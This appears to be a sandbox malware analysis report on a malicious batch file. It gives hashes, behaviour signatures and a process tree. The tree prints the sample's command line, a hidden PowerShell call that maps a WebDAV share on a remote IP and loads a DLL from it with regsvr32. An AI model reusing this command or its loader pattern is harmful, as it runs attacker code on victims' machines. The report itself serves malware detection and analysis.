Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    21/07/2024, 18:17 UTC

General

  • Target

    54961107317895106.bat

  • Size

    9KB

  • MD5

    d90267c51ff3376e4b64fffeb178f342

  • SHA1

    3d7b4a9495356c6b447c232dff22211bd68fa0ea

  • SHA256

    d93c97cfceef5b3f38964fd78b31898f065910697eef8a9439ff9c91074b84f3

  • SHA512

    d675d51f2dfdb227f08d320150592402f6bd55b3acfdfa3e69c59469157779026f9757a834e3685d2d340c332c62d829a520435cd81c169902de76aa9e10a87e

  • SSDEEP

    192:4EAgwQg0MzUBn8BKBxfOCuqf6MYHVpHsZ/ND+b:/AgaTqnCKBxyqij1pM+b

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\54961107317895106.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2020
    • C:\Program Files\Windows NT\Accessories\wordpad.exe
      "C:\Program Files\Windows NT\Accessories\wordpad.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:2732
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\310113068128184.dll
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\
        3⤵
          PID:2552
        • C:\Windows\system32\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\310113068128184.dll
          3⤵
            PID:2544

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2744-23-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

        Filesize

        2.9MB

      • memory/2744-24-0x0000000002860000-0x0000000002868000-memory.dmp

        Filesize

        32KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.